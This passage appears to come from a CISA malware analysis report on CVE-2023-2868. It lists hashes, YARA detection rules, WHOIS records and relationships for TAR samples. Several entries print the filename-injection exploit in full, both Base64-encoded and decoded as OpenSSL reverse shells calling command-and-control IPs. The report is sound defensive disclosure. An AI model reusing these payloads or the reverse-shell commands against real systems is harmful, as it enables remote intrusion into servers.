SHA256_7 = "b52a9844d8368abe70b6ba0d8df84f88c8c0029dcbcf599665acd703b255d5d2"
SHA256_8 = "caa795c4c934219d287379b20c2912af0f815de95bb73e0f02f5fe6eb9aa50bd"
SHA256_9 = "cf0996a3aee148bc060f4726435dd0d7f1af79082277f407dfa07d81181322ba"
SHA256_10 = "f536a7b75b7205762b75a037ebf6503029aab1a02afab14b2709797c32e7e0fa"
strings:
$s1 = { 59 57 4a 6a 5a 47 56 6d 5a }
$s2 = { 59 7a 4a 57 4d 47 4d 79 62 47 74 4a 53 45 35 76 53 55 4d 78 61 }
$s3 = { 54 44 4e 53 64 47 4e 44 4f }
$s4 = { 5a 45 63 78 64 }
$s5 = { 57 54 49 35 64 57 4a 74 56 6d 70 6b }
$s6 = { 53 55 52 4a 4b 30 77 79 55 6d 78 6b 61 54 6c 31 5a 46 64 34 63 }
$s7 = { 4c 6e 52 34 64 41 }
condition:
5 of them
}
ssdeep Matches
No matches found.
Relationships
3f2ca19ad3...
Connected_To
107[.]148[.]223[.]196
Description
This artifact contains the same payloads as “b5113e29ec23f6e1be289b99dc7ac2af1c252b4b6ff6e977f7827ab7fd686321.”
80342108e9f0f1fd6b5c44e88006cebe37e4eccb3a0f567636b22ad210c0a043
Tags
backdoortrojan
Details
-->
Name
1666612600-0a151727b265b10001-RIRGpJ
Size
29883 bytes
Type
ASCII text
MD5
74b2cb4099ffb3a6eb2ada984f08a55c
SHA1
3a3d73662809b957c94407e7938c90a41e9b6023
SHA256
80342108e9f0f1fd6b5c44e88006cebe37e4eccb3a0f567636b22ad210c0a043
SHA512
4b4e7f5ef6fa006a3758649f2e664ca93198c3f82956c96975cafd815148b34eae7e7b6a3a2b9b632fe2f807713c536b77c7054ddd71a2851ed92ec7b4d26af0
ssdeep
96:81TMqi+YItziclXNI2dB+1jhXoueM1rHNqudK3b7OKiTcGuRNdecg6dxkXBd6UTS:Co+VmYXNvBkjh4tOLH4q6fbWS
Entropy
1.661984
Malware Result
unknown
Antivirus
ESET
Linux/Exploit.CVE-2023-2868.A trojan
YARA Rules
rule CISA_10454006_08 : trojan backdoor remote_access_trojan accesses_remote_machines communicates_with_c2
{
meta:
Author = "CISA Code & Media Analysis"
Incident = "10454006"
Date = "2023-07-05"
Last_Modified = "20230712_1400"
Actor = "n/a"
Family = "n/a"
Capabilities = "accesses-remote-machines communicates-with-c2"
Malware_Type = "trojan backdoor remote-access-trojan"
Tool_Type = "unknown"
Description = "Detects reverse shell samples in TAR files used in CVE-2023-2868 encoded block"
SHA256_1 = "0b917d945a7491869fa5003f6b85c09f5f45795a7852a8b63ba1abdc9797d6a6"
SHA256_2 = "2a860849a9e68df0053556b85f20010a1384b4c87594ba4f9bb3e1b1d287b095"
SHA256_3 = "3f2ca19ad3635f379968b0302c7e42cf954f85ab61166c6f70acfebc72f38ab7"
SHA256_4 = "80342108e9f0f1fd6b5c44e88006cebe37e4eccb3a0f567636b22ad210c0a043"
SHA256_5 = "9d0c7a45dd00d31a9724fa9e96cb8ac99dd5a6502fe4515cedaabb2e58b1c5f5"
SHA256_6 = "b5113e29ec23f6e1be289b99dc7ac2af1c252b4b6ff6e977f7827ab7fd686321"
SHA256_7 = "b52a9844d8368abe70b6ba0d8df84f88c8c0029dcbcf599665acd703b255d5d2"
SHA256_8 = "caa795c4c934219d287379b20c2912af0f815de95bb73e0f02f5fe6eb9aa50bd"
SHA256_9 = "cf0996a3aee148bc060f4726435dd0d7f1af79082277f407dfa07d81181322ba"
SHA256_10 = "f536a7b75b7205762b75a037ebf6503029aab1a02afab14b2709797c32e7e0fa"
strings:
$s1 = { 59 57 4a 6a 5a 47 56 6d 5a }
$s2 = { 59 7a 4a 57 4d 47 4d 79 62 47 74 4a 53 45 35 76 53 55 4d 78 61 }
$s3 = { 54 44 4e 53 64 47 4e 44 4f }
$s4 = { 5a 45 63 78 64 }
$s5 = { 57 54 49 35 64 57 4a 74 56 6d 70 6b }
$s6 = { 53 55 52 4a 4b 30 77 79 55 6d 78 6b 61 54 6c 31 5a 46 64 34 63 }
$s7 = { 4c 6e 52 34 64 41 }
condition:
5 of them
}
ssdeep Matches
No matches found.
Relationships
80342108e9...
Connected_To
107[.]148[.]223[.]196
Description
This artifact contains the same payloads as “b5113e29ec23f6e1be289b99dc7ac2af1c252b4b6ff6e977f7827ab7fd686321.”
f536a7b75b7205762b75a037ebf6503029aab1a02afab14b2709797c32e7e0fa
Tags
backdoortrojan
Details
-->
Name
1666614870-0a151727b166b50001-RIRGpJ
Size
29883 bytes
Type
ASCII text
MD5
e7f1555f9f9e9bca1898c720b2ef0866
SHA1
59ac617c7f6d779d0853921afbaf36574846ab9f
SHA256
f536a7b75b7205762b75a037ebf6503029aab1a02afab14b2709797c32e7e0fa
SHA512
d5b930f4a13243ffd5ab43a50de5ba01154ee5054c4cea6830f583d761cd22828efd62e8cf35d5892649587b8982d3c8e7f4440a34ccc9b40761355a69372a06
ssdeep
96:7Rz1sZZqi+YIxiclk7342dB+1jhUQomK1rHNqudK3b7OKiTcGuRNdecg6dxkXBdu:7R+J+VcY43fBkjhxjkLH4q6fbOo
Entropy
1.661252
Malware Result
unknown
Antivirus
ESET
Linux/Exploit.CVE-2023-2868.A trojan
YARA Rules
rule CISA_10454006_08 : trojan backdoor remote_access_trojan accesses_remote_machines communicates_with_c2
{
meta:
Author = "CISA Code & Media Analysis"
Incident = "10454006"
Date = "2023-07-05"
Last_Modified = "20230712_1400"
Actor = "n/a"
Family = "n/a"
Capabilities = "accesses-remote-machines communicates-with-c2"
Malware_Type = "trojan backdoor remote-access-trojan"
Tool_Type = "unknown"
Description = "Detects reverse shell samples in TAR files used in CVE-2023-2868 encoded block"
SHA256_1 = "0b917d945a7491869fa5003f6b85c09f5f45795a7852a8b63ba1abdc9797d6a6"
SHA256_2 = "2a860849a9e68df0053556b85f20010a1384b4c87594ba4f9bb3e1b1d287b095"
SHA256_3 = "3f2ca19ad3635f379968b0302c7e42cf954f85ab61166c6f70acfebc72f38ab7"
SHA256_4 = "80342108e9f0f1fd6b5c44e88006cebe37e4eccb3a0f567636b22ad210c0a043"
SHA256_5 = "9d0c7a45dd00d31a9724fa9e96cb8ac99dd5a6502fe4515cedaabb2e58b1c5f5"
SHA256_6 = "b5113e29ec23f6e1be289b99dc7ac2af1c252b4b6ff6e977f7827ab7fd686321"
SHA256_7 = "b52a9844d8368abe70b6ba0d8df84f88c8c0029dcbcf599665acd703b255d5d2"
SHA256_8 = "caa795c4c934219d287379b20c2912af0f815de95bb73e0f02f5fe6eb9aa50bd"
SHA256_9 = "cf0996a3aee148bc060f4726435dd0d7f1af79082277f407dfa07d81181322ba"
SHA256_10 = "f536a7b75b7205762b75a037ebf6503029aab1a02afab14b2709797c32e7e0fa"
strings:
$s1 = { 59 57 4a 6a 5a 47 56 6d 5a }
$s2 = { 59 7a 4a 57 4d 47 4d 79 62 47 74 4a 53 45 35 76 53 55 4d 78 61 }
$s3 = { 54 44 4e 53 64 47 4e 44 4f }
$s4 = { 5a 45 63 78 64 }
$s5 = { 57 54 49 35 64 57 4a 74 56 6d 70 6b }
$s6 = { 53 55 52 4a 4b 30 77 79 55 6d 78 6b 61 54 6c 31 5a 46 64 34 63 }
$s7 = { 4c 6e 52 34 64 41 }
condition:
5 of them
}
ssdeep Matches
No matches found.
Relationships
f536a7b75b...
Connected_To
107[.]148[.]223[.]196
Description
This artifact contains the same payloads as “b5113e29ec23f6e1be289b99dc7ac2af1c252b4b6ff6e977f7827ab7fd686321.”
949d4b01f31256e5e9c2b04e557dcca0a25fc2f6aa3618936befc7525e1df788
Tags
backdoortrojan
Details
-->
Name
snapshot.tar
Size
20480 bytes
Type
POSIX tar archive (GNU)
MD5
42722b7d04f58dcb8bd80fe41c7ea09e
SHA1
1903a3553bcb291579206b39e7818c77e2c07054
SHA256
949d4b01f31256e5e9c2b04e557dcca0a25fc2f6aa3618936befc7525e1df788
SHA512
86f28510b50f1f0640065b2f5f6049d879c99c659b80dc4604942e2df8f7ff143f70acce05491f95e8eeff0718c69011c1c92d2611f3b86a5419c6dea1b802e0
ssdeep
48:G8n4+ntb7Ytb7bIbfj1ZbfjZGCGBCGpiK4rD1EK4rD1:GaXiXbELnLHGQGdqZq
Entropy
0.978982
Malware Result
unknown
Antivirus
No matches found.
YARA Rules
rule CISA_10452108_03 : backdoor communicates_with_c2 installs_other_components
{
meta:
Author = "CISA Code & Media Analysis"
Incident = "10452108"
Date = "2023-06-20"
Last_Modified = ""
Actor = "n/a"
Family = "n/a"
Capabilities = "communicates-with-c2 installs-other-components"
Malware_Type = "backdoor"
Tool_Type = "unknown"
Description = "Detects malicious Linux reverse shell samples"
SHA256_1 = "2a5de691243f2b91f164c3021c157fbd783b4f3e7d5f5950182e52ec868cd40b"
strings:
$s0 = { 6f 47 68 37 6f 68 63 34 }
$s1 = { 41 6b 65 6f 38 61 68 58 }
$s2 = { 65 65 71 75 65 69 37 41 30 39 33 30 32 }
condition:
all of them
}
rule CISA_10454006_09 : trojan backdoor remote_access_trojan accesses_remote_machines communicates_with_c2
{
meta:
Author = "CISA Code & Media Analysis"
Incident = "10454006"
Date = "2023-07-05"
Last_Modified = "20230712_1400"
Actor = "n/a"
Family = "n/a"
Capabilities = "accesses-remote-machines communicates-with-c2"
Malware_Type = "trojan backdoor remote-access-trojan"
Tool_Type = "unknown"
Description = "Detects reverse shell samples in TAR files used in CVE-2023-2868"
SHA256_1 = "949d4b01f31256e5e9c2b04e557dcca0a25fc2f6aa3618936befc7525e1df788"
SHA256_2 = "f289b565839794fe4f450ed0c9343b8fb699f97544d9af2a60851abc8b4656e0"
SHA256_3 = "2a5de691243f2b91f164c3021c157fbd783b4f3e7d5f5950182e52ec868cd40b"
strings:
$s1 = { 61 62 63 64 65 66 67 }
$s2 = { 63 32 56 30 63 32 6c 6b 49 48 4e 6f 49 43 31 6a }
$s3 = { 49 44 49 2b 4c 32 52 6c 64 69 39 75 64 57 78 73 }
$s4 = { 49 43 39 30 62 58 41 76 }
$s5 = { 59 32 39 75 62 6d 56 6a 64 }
$n1 = { 6f 47 68 37 6f 68 63 34 }
$n2 = { 41 6b 65 6f 38 61 68 58 }
$n3 = { 65 65 71 75 65 69 37 41 30 39 33 30 32 }
condition:
all of ($s*) or all of ($n*)
}
ssdeep Matches
No matches found.
Relationships
949d4b01f3...
Dropped
2a5de691243f2b91f164c3021c157fbd783b4f3e7d5f5950182e52ec868cd40b
949d4b01f3...
Connected_To
107[.]148[.]223[.]196
Description
This artifact is a .tar sample that contains five files compressed. Four of the files within this .tar sample do not contain malicious capabilities. One of the files contains a malicious payload inside its filename that exploits CVE-2023-2868. Upon decompressing the archive the payload is seen below.
--Begin Payload--
'`abcdefg=c2V0c2lkIHNoIC1jICJta2ZpZm8gL3RtcC9wO3NoIC1pIDwvdG1wL3AgMj4mMXxvcGVuc3NsIHNfY2xpZW50IC1xdWlldCAtY29ubmVjdCAxMDcuMTQ4LjIyMy4xOTY6ODA4MCA+L3RtcC9wIDI+L2Rldi9udWxsO3JtIC90bXAvcCI=;ee=ba;G=s;"ech"o $abcdefg|${ee}se64 -d|${G}h;wh66489.txt`'
--End Payload--
f289b565839794fe4f450ed0c9343b8fb699f97544d9af2a60851abc8b4656e0
Tags
backdoortrojan
Details
-->
Name
snapshot0.tar
Size
20480 bytes
Type
POSIX tar archive (GNU)
MD5
ac4fb6d0bfc871be6f68bfa647fc0125
SHA1
dc5841d8ed9ab8a5f3496f2258eafb1e0cedf4d3
SHA256
f289b565839794fe4f450ed0c9343b8fb699f97544d9af2a60851abc8b4656e0
SHA512
0ebf9a75b7bcae7b7e28bef4d8e81e53829678104b09220e684e54df211130fafaa3387f057cbe8fdf24a0138e1ac9f5f24d83f467c4e0469c7dff009e8381d5
ssdeep
48:G8nZm+ntb7Ytb7bIbfj1ZbfjZGCGBCGpiK4rD1EK4rD1:GmfXiXbELnLHGQGdqZq
Entropy
0.978201
Malware Result
unknown
Antivirus
No matches found.
YARA Rules
rule CISA_10452108_03 : backdoor communicates_with_c2 installs_other_components
{
meta:
Author = "CISA Code & Media Analysis"
Incident = "10452108"
Date = "2023-06-20"
Last_Modified = ""
Actor = "n/a"
Family = "n/a"
Capabilities = "communicates-with-c2 installs-other-components"
Malware_Type = "backdoor"
Tool_Type = "unknown"
Description = "Detects malicious Linux reverse shell samples"
SHA256_1 = "2a5de691243f2b91f164c3021c157fbd783b4f3e7d5f5950182e52ec868cd40b"
strings:
$s0 = { 6f 47 68 37 6f 68 63 34 }
$s1 = { 41 6b 65 6f 38 61 68 58 }
$s2 = { 65 65 71 75 65 69 37 41 30 39 33 30 32 }
condition:
all of them
}
rule CISA_10454006_09 : trojan backdoor remote_access_trojan accesses_remote_machines communicates_with_c2
{
meta:
Author = "CISA Code & Media Analysis"
Incident = "10454006"
Date = "2023-07-05"
Last_Modified = "20230712_1400"
Actor = "n/a"
Family = "n/a"
Capabilities = "accesses-remote-machines communicates-with-c2"
Malware_Type = "trojan backdoor remote-access-trojan"
Tool_Type = "unknown"
Description = "Detects reverse shell samples in TAR files used in CVE-2023-2868"
SHA256_1 = "949d4b01f31256e5e9c2b04e557dcca0a25fc2f6aa3618936befc7525e1df788"
SHA256_2 = "f289b565839794fe4f450ed0c9343b8fb699f97544d9af2a60851abc8b4656e0"
SHA256_3 = "2a5de691243f2b91f164c3021c157fbd783b4f3e7d5f5950182e52ec868cd40b"
strings:
$s1 = { 61 62 63 64 65 66 67 }
$s2 = { 63 32 56 30 63 32 6c 6b 49 48 4e 6f 49 43 31 6a }
$s3 = { 49 44 49 2b 4c 32 52 6c 64 69 39 75 64 57 78 73 }
$s4 = { 49 43 39 30 62 58 41 76 }
$s5 = { 59 32 39 75 62 6d 56 6a 64 }
$n1 = { 6f 47 68 37 6f 68 63 34 }
$n2 = { 41 6b 65 6f 38 61 68 58 }
$n3 = { 65 65 71 75 65 69 37 41 30 39 33 30 32 }
condition:
all of ($s*) or all of ($n*)
}
ssdeep Matches
No matches found.
Relationships
f289b56583...
Dropped
2a5de691243f2b91f164c3021c157fbd783b4f3e7d5f5950182e52ec868cd40b
f289b56583...
Connected_To
107[.]148[.]223[.]196
Description
This artifact is a .tar sample that contains five files compressed. Four of the files within this .tar sample do not contain malicious capabilities. One of the files contains a malicious payload inside its filename that exploits CVE-2023-2868. Upon decompressing the archive the payload is seen below.
--Begin Payload--
'`abcdefg=c2V0c2lkIHNoIC1jICJta2ZpZm8gL3RtcC9wO3NoIC1pIDwvdG1wL3AgMj4mMXxvcGVuc3NsIHNfY2xpZW50IC1xdWlldCAtY29ubmVjdCAxMDcuMTQ4LjIyMy4xOTY6NDQzID4vdG1wL3AgMj4vZGV2L251bGw7cm0gL3RtcC9wIg==;ee=ba;G=s;"ech"o $abcdefg|${ee}se64 -d|${G}h;wh66489.txt`'
--End Payload--
2a5de691243f2b91f164c3021c157fbd783b4f3e7d5f5950182e52ec868cd40b
Tags
backdoortrojan
Details
-->
Name
abcdefgc2V0c2lkIHNoIC1jICJta2ZpZm8gL3RtcC9wO3NoIC1pIDwvdG1wL3AgMj4mMXxvcGVuc3NsIHNfY2xpZW50IC1xdWlldCAtY29ubmVjdCAxMDcuMTQ4LjIyMy4xOTY6ODA4MCAL3RtcC9wIDIL2Rldi9udWxsO3JtIC90bXAvcCIeebaGs22ech22o_abcdefgeese64_-dGhwh66489.txt
Name
abcdefg_c2V0c2lkIHNoIC1jICJta2ZpZm8gL3RtcC9wO3NoIC1pIDwvdG1wL3AgMj4mMXxvcGVuc3NsIHNfY2xpZW50IC1xdWlldCAtY29ubmVjdCAxMDcuMTQ4LjIyMy4xOTY6ODA4MCAL3RtcC9wIDIL2Rldi9udWxsO3JtIC90bXAvcCI_ee_ba_G_s_ech_o_abcdefg_ee_se64_d_G_h_wh66489.txt
Size
29 bytes
Type
ASCII text, with no line terminators
MD5
fe1e2d676c91f899b706682b70176983
SHA1
77b1864c489affe0ac2284135050373951b7987e
SHA256
2a5de691243f2b91f164c3021c157fbd783b4f3e7d5f5950182e52ec868cd40b
SHA512
1c22a05e50aa3d954c2d5a1629e192a915c9d576cd1d7cd9ac3a3bbb35d934f6fc1768d996653a0bca2950185c2a9cec3d1675ca29a19b69da26100990eaa0d8
ssdeep
3:TTGRH+YHMFck:TKYYHIck
Entropy
4.047299
Malware Result
unknown
Antivirus
AhnLab
Exploit/Bin.CVE-2023-2868
YARA Rules
rule CISA_10452108_03 : backdoor communicates_with_c2 installs_other_components
{
meta:
Author = "CISA Code & Media Analysis"
Incident = "10452108"
Date = "2023-06-20"
Last_Modified = ""
Actor = "n/a"
Family = "n/a"
Capabilities = "communicates-with-c2 installs-other-components"
Malware_Type = "backdoor"
Tool_Type = "unknown"
Description = "Detects malicious Linux reverse shell samples"
SHA256_1 = "2a5de691243f2b91f164c3021c157fbd783b4f3e7d5f5950182e52ec868cd40b"
strings:
$s0 = { 6f 47 68 37 6f 68 63 34 }
$s1 = { 41 6b 65 6f 38 61 68 58 }
$s2 = { 65 65 71 75 65 69 37 41 30 39 33 30 32 }
condition:
all of them
}
rule CISA_10454006_09 : trojan backdoor remote_access_trojan accesses_remote_machines communicates_with_c2
{
meta:
Author = "CISA Code & Media Analysis"
Incident = "10454006"
Date = "2023-07-05"
Last_Modified = "20230712_1400"
Actor = "n/a"
Family = "n/a"
Capabilities = "accesses-remote-machines communicates-with-c2"
Malware_Type = "trojan backdoor remote-access-trojan"
Tool_Type = "unknown"
Description = "Detects reverse shell samples in TAR files used in CVE-2023-2868"
SHA256_1 = "949d4b01f31256e5e9c2b04e557dcca0a25fc2f6aa3618936befc7525e1df788"
SHA256_2 = "f289b565839794fe4f450ed0c9343b8fb699f97544d9af2a60851abc8b4656e0"
SHA256_3 = "2a5de691243f2b91f164c3021c157fbd783b4f3e7d5f5950182e52ec868cd40b"
strings:
$s1 = { 61 62 63 64 65 66 67 }
$s2 = { 63 32 56 30 63 32 6c 6b 49 48 4e 6f 49 43 31 6a }
$s3 = { 49 44 49 2b 4c 32 52 6c 64 69 39 75 64 57 78 73 }
$s4 = { 49 43 39 30 62 58 41 76 }
$s5 = { 59 32 39 75 62 6d 56 6a 64 }
$n1 = { 6f 47 68 37 6f 68 63 34 }
$n2 = { 41 6b 65 6f 38 61 68 58 }
$n3 = { 65 65 71 75 65 69 37 41 30 39 33 30 32 }
condition:
all of ($s*) or all of ($n*)
}
ssdeep Matches
No matches found.
Relationships
2a5de69124...
Dropped_By
949d4b01f31256e5e9c2b04e557dcca0a25fc2f6aa3618936befc7525e1df788
2a5de69124...
Dropped_By
f289b565839794fe4f450ed0c9343b8fb699f97544d9af2a60851abc8b4656e0
2a5de69124...
Connected_To
107[.]148[.]223[.]196
Description
This artifact is dropped by two different .tar files and contains a payload inside its filename that exploits CVE-2023-2868. The exploit payload is a shell script code with an embedded Base64 encoded reverse shell. Upon execution the malware Base64 decodes and executes the reverse shell code. The reverse shells establish connections using the "OpenSSL" to the C2 IP address "107[.]148[.]223[.]196" and ports “8080” or "443." The standard input and output are redirected to the named pipe "/tmp/p" and then removes "tmp/p" after the connection is closed.
The contents within the two dropped files are the same and is a string "oGh7ohc4Akeo8ahXeequei7A09302." This accounts for the two samples having the same hash, however, payload contents are different within the names of these files. When the payload executes, the commands slightly differ in the use of the port number as seen below.
When the "snapshot.tar" file is decompressed the below payload is revealed.
--Begin Payload--
'`abcdefg=c2V0c2lkIHNoIC1jICJta2ZpZm8gL3RtcC9wO3NoIC1pIDwvdG1wL3AgMj4mMXxvcGVuc3NsIHNfY2xpZW50IC1xdWlldCAtY29ubmVjdCAxMDcuMTQ4LjIyMy4xOTY6ODA4MCA+L3RtcC9wIDI+L2Rldi9udWxsO3JtIC90bXAvcCI=;ee=ba;G=s;"ech"o $abcdefg|${ee}se64 -d|${G}h;wh66489.txt`'
--End Payload--
--Begin Decoded Payload--
setsid sh -c "mkfifo /tmp/p;sh -i </tmp/p 2>&1|openssl s_client -quiet -connect 107[.]148[.]223[.]196:8080 >/tmp/p 2>/dev/null;rm /tmp/p"
--End Decoded Payload--
When the "snapshot0.tar" file is decompressed the below payload is revealed.
--Begin Payload--
'`abcdefg=c2V0c2lkIHNoIC1jICJta2ZpZm8gL3RtcC9wO3NoIC1pIDwvdG1wL3AgMj4mMXxvcGVuc3NsIHNfY2xpZW50IC1xdWlldCAtY29ubmVjdCAxMDcuMTQ4LjIyMy4xOTY6NDQzID4vdG1wL3AgMj4vZGV2L251bGw7cm0gL3RtcC9wIg==;ee=ba;G=s;"ech"o $abcdefg|${ee}se64 -d|${G}h;wh66489.txt`'
--End Payload--
--Begin Decoded Payload--
setsid sh -c "mkfifo /tmp/p;sh -i </tmp/p 2>&1|openssl s_client -quiet -connect 107[.]148[.]223[.]196:443 >/tmp/p 2>/dev/null;rm /tmp/p"
--End Decoded Payload--
107[.]148[.]223[.]196
Tags
command-and-control
Ports
Whois
NetRange: 107.148.0.0 - 107.149.255.255
CIDR: 107.148.0.0/15
NetName: PT-82-10
NetHandle: NET-107-148-0-0-1
Parent: NET107 (NET-107-0-0-0-0)
NetType: Direct Allocation
OriginAS: AS398478, AS398993, AS399195, AS54600, AS398823
Organization: PEG TECH INC (PT-82)
RegDate: 2013-11-08
Updated: 2021-01-06
Ref: https://rdap.arin.net/registry/ip/107.148.0.0
OrgName: PEG TECH INC
OrgId: PT-82
Address: 55 South Market Street, Suite 320
City: San Jose
StateProv: CA
PostalCode: 95113
Country: US
RegDate: 2012-03-27
Updated: 2017-01-28
Ref: https://rdap.arin.net/registry/entity/PT-82
OrgNOCHandle: NOC12550-ARIN
OrgNOCName: NOC
OrgNOCPhone: +1-657-206-5036
OrgNOCEmail:
OrgNOCRef: https://rdap.arin.net/registry/entity/NOC12550-ARIN
OrgAbuseHandle: ABUSE3497-ARIN
OrgAbuseName: Abuse
OrgAbusePhone: +1-657-206-5036
OrgAbuseEmail:
OrgAbuseRef: https://rdap.arin.net/registry/entity/ABUSE3497-ARIN
OrgTechHandle: NOC12550-ARIN
OrgTechName: NOC
OrgTechPhone: +1-657-206-5036
OrgTechEmail:
OrgTechRef: https://rdap.arin.net/registry/entity/NOC12550-ARIN
Relationships
107[.]148[.]223[.]196
Connected_From
949d4b01f31256e5e9c2b04e557dcca0a25fc2f6aa3618936befc7525e1df788
107[.]148[.]223[.]196
Connected_From
2a860849a9e68df0053556b85f20010a1384b4c87594ba4f9bb3e1b1d287b095
107[.]148[.]223[.]196
Connected_From
cf0996a3aee148bc060f4726435dd0d7f1af79082277f407dfa07d81181322ba
107[.]148[.]223[.]196
Connected_From
caa795c4c934219d287379b20c2912af0f815de95bb73e0f02f5fe6eb9aa50bd
107[.]148[.]223[.]196
Connected_From
0b917d945a7491869fa5003f6b85c09f5f45795a7852a8b63ba1abdc9797d6a6
107[.]148[.]223[.]196
Connected_From
b5113e29ec23f6e1be289b99dc7ac2af1c252b4b6ff6e977f7827ab7fd686321
107[.]148[.]223[.]196
Connected_From
b52a9844d8368abe70b6ba0d8df84f88c8c0029dcbcf599665acd703b255d5d2
107[.]148[.]223[.]196
Connected_From
9d0c7a45dd00d31a9724fa9e96cb8ac99dd5a6502fe4515cedaabb2e58b1c5f5
107[.]148[.]223[.]196
Connected_From
3f2ca19ad3635f379968b0302c7e42cf954f85ab61166c6f70acfebc72f38ab7
107[.]148[.]223[.]196
Connected_From
80342108e9f0f1fd6b5c44e88006cebe37e4eccb3a0f567636b22ad210c0a043
107[.]148[.]223[.]196
Connected_From
f536a7b75b7205762b75a037ebf6503029aab1a02afab14b2709797c32e7e0fa
107[.]148[.]223[.]196
Connected_From
f289b565839794fe4f450ed0c9343b8fb699f97544d9af2a60851abc8b4656e0
107[.]148[.]223[.]196
Connected_From
2a5de691243f2b91f164c3021c157fbd783b4f3e7d5f5950182e52ec868cd40b
Description
This IP address is used as C2 by the samples exploiting CVE-2023-2868.
2b2b7c5e825b7a18e13319b4a1275a0dd0086abd58b2d45939269d5a613a41e7
Tags
backdoortrojan
Details
-->
Name
abcdefgc2V0c2lkIHNoIC1jICJta2ZpZm8gL3RtcC9wO3NoIC1pIDwvdG1wL3AgMj4mMXxvcGVuc3NsIHNfY2xpZW50IC1xdWlldCAtY29ubmVjdCAxMDcuMTQ4LjIxOS41NDo0NDMgPi90bXAvcCAyPi9kZXYvbnVsbDtybSAvdG1wL3Ai_eebaGsecho_abcdefgeese64_dGhwh66489.txt
Size
245 bytes
Type
ASCII text, with no line terminators
MD5
212031b3a6e958fb7b545862407e5f7a
SHA1
693247647b55476a383579f07e7e1eb16fc86b70
SHA256
2b2b7c5e825b7a18e13319b4a1275a0dd0086abd58b2d45939269d5a613a41e7
SHA512
88453bf84dfcbf7b162a414e06d2c1038924844aebf6cac847130ccb1aa32debaaebee13ce58ffa2277e1aeadc101b8a7f4ac53b2caa7405467846c783be5f9a
ssdeep
6:a5YA5VJ94nqrz8r+pssRHUuHQjgxlopNO1oCb+LlvN7kqS200orzFn:a5YSVMn0k+phRPHQjgxl0Fk7PzF
Entropy
5.801599
Malware Result
unknown
Antivirus
No matches found.
YARA Rules
No matches found.
ssdeep Matches
No matches found.
Relationships
2b2b7c5e82...
Connected_To
107[.]148[.]219[.]54
Description
This artifact contains a payload that exploits CVE-2023-2868. The exploit payload is a shell script code with an embedded Base64 encoded reverse shell. Upon execution the malware base64 decodes and executes the reverse shell code. The reverse shell establishes connections using the "OpenSSL" to the C2 IP address "107[.]148[.]219[.]54" and port “443” and redirects the standard input and output to the named pipe "/tmp/p" and then removes "/tmp/p" after the connection is closed.
--Begin Encoded Payload--
'`abcdefg\=c2V0c2lkIHNoIC1jICJta2ZpZm8gL3RtcC9wO3NoIC1pIDwvdG1wL3AgMj4mMXxvcGVuc3NsIHNfY2xpZW50IC1xdWlldCAtY29ubmVjdCAxMDcuMTQ4LjIxOS41NDo0NDMgPi90bXAvcCAyPi9kZXYvbnVsbDtybSAvdG1wL3Ai;ee\=ba;G\=s;"ech"o $abcdefg;${ee}se64 -d;${G}h;wh66489.txt`'
--End Encoded Payload--
--Begin Decoded Payload--
setsid sh -c "mkfifo /tmp/p;sh -i </tmp/p 2>&1|openssl s_client -quiet -connect 107[.]148[.]219[.]54:443 >/tmp/p 2>/dev/null;rm /tmp/p"
--End Decoded Payload--
107[.]148[.]219[.]54
Tags
command-and-control
Ports
Whois
NetRange: 107.148.0.0 - 107.149.255.255
CIDR: 107.148.0.0/15
NetName: PT-82-10
NetHandle: NET-107-148-0-0-1
Parent: NET107 (NET-107-0-0-0-0)
NetType: Direct Allocation
OriginAS: AS398478, AS398993, AS399195, AS54600, AS398823
Organization: PEG TECH INC (PT-82)
RegDate: 2013-11-08
Updated: 2021-01-06
Ref: https://rdap.arin.net/registry/ip/107.148.0.0
OrgName: PEG TECH INC
OrgId: PT-82
Address: 55 South Market Street, Suite 320
City: San Jose
StateProv: CA
PostalCode: 95113
Country: US
RegDate: 2012-03-27
Updated: 2017-01-28
Ref: https://rdap.arin.net/registry/entity/PT-82
OrgAbuseHandle: ABUSE3497-ARIN
OrgAbuseName: Abuse
OrgAbusePhone: +1-657-206-5036
OrgAbuseEmail:
OrgAbuseRef: https://rdap.arin.net/registry/entity/ABUSE3497-ARIN
OrgTechHandle: NOC12550-ARIN
OrgTechName: NOC
OrgTechPhone: +1-657-206-5036
OrgTechEmail:
OrgTechRef: https://rdap.arin.net/registry/entity/NOC12550-ARIN
OrgNOCHandle: NOC12550-ARIN
OrgNOCName: NOC
OrgNOCPhone: +1-657-206-5036
OrgNOCEmail:
OrgNOCRef: https://rdap.arin.net/registry/entity/NOC12550-ARIN
Relationships
107[.]148[.]219[.]54
Connected_From
2b2b7c5e825b7a18e13319b4a1275a0dd0086abd58b2d45939269d5a613a41e7
Description
This IP address is used as C2 by the samples exploiting CVE-2023-2868.
Relationship Summary
2a860849a9...
Connected_To
107[.]148[.]223[.]196
cf0996a3ae...
Connected_To
107[.]148[.]223[.]196
caa795c4c9...
Connected_To
107[.]148[.]223[.]196
0b917d945a...
Connected_To
107[.]148[.]223[.]196
b5113e29ec...
Connected_To
107[.]148[.]223[.]196
b52a9844d8...
Connected_To
107[.]148[.]223[.]196
9d0c7a45dd...
Connected_To
107[.]148[.]223[.]196
3f2ca19ad3...
Connected_To
107[.]148[.]223[.]196
80342108e9...
Connected_To
107[.]148[.]223[.]196
f536a7b75b...
Connected_To
107[.]148[.]223[.]196
949d4b01f3...
Dropped
2a5de691243f2b91f164c3021c157fbd783b4f3e7d5f5950182e52ec868cd40b
949d4b01f3...
Connected_To
107[.]148[.]223[.]196
f289b56583...
Dropped
2a5de691243f2b91f164c3021c157fbd783b4f3e7d5f5950182e52ec868cd40b
f289b56583...
Connected_To
107[.]148[.]223[.]196
2a5de69124...
Dropped_By
949d4b01f31256e5e9c2b04e557dcca0a25fc2f6aa3618936befc7525e1df788
2a5de69124...
Dropped_By
f289b565839794fe4f450ed0c9343b8fb699f97544d9af2a60851abc8b4656e0
2a5de69124...
Connected_To
107[.]148[.]223[.]196
107[.]148[.]223[.]196
Connected_From
949d4b01f31256e5e9c2b04e557dcca0a25fc2f6aa3618936befc7525e1df788
107[.]148[.]223[.]196
Connected_From
2a860849a9e68df0053556b85f20010a1384b4c87594ba4f9bb3e1b1d287b095
107[.]148[.]223[.]196
Connected_From
cf0996a3aee148bc060f4726435dd0d7f1af79082277f407dfa07d81181322ba
107[.]148[.]223[.]196
Connected_From
caa795c4c934219d287379b20c2912af0f815de95bb73e0f02f5fe6eb9aa50bd
107[.]148[.]223[.]196
Connected_From
0b917d945a7491869fa5003f6b85c09f5f45795a7852a8b63ba1abdc9797d6a6
107[.]148[.]223[.]196
Connected_From
